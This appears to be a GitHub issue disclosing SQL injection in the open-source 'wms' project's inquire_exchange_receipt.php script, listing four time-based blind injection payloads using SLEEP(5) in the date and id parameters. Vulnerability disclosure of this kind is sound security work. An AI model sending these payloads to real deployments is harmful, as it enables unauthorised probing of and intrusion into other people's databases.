wms icon indicating copy to clipboard operation
wms copied to clipboard

Published 20 hours ago verified publisher icon FeMiner

SQL injection in /test/inquire_exchange_receipt.php

Open YanC1e opened this issue 1 month ago • 0 comments

Image

With https://github.com/FeMiner/wms/issues/17 The same vulnerability principle will not be described in detail. payload: /test/inquire_exchange_receipt.php?option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_exchange_receipt.php?option=date&date2=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_exchange_receipt.php?option=warehouse&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

/test/inquire_exchange_receipt.php?option=warehouse2&id=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh

YanC1e avatar Jan 27 '25 16:01 YanC1e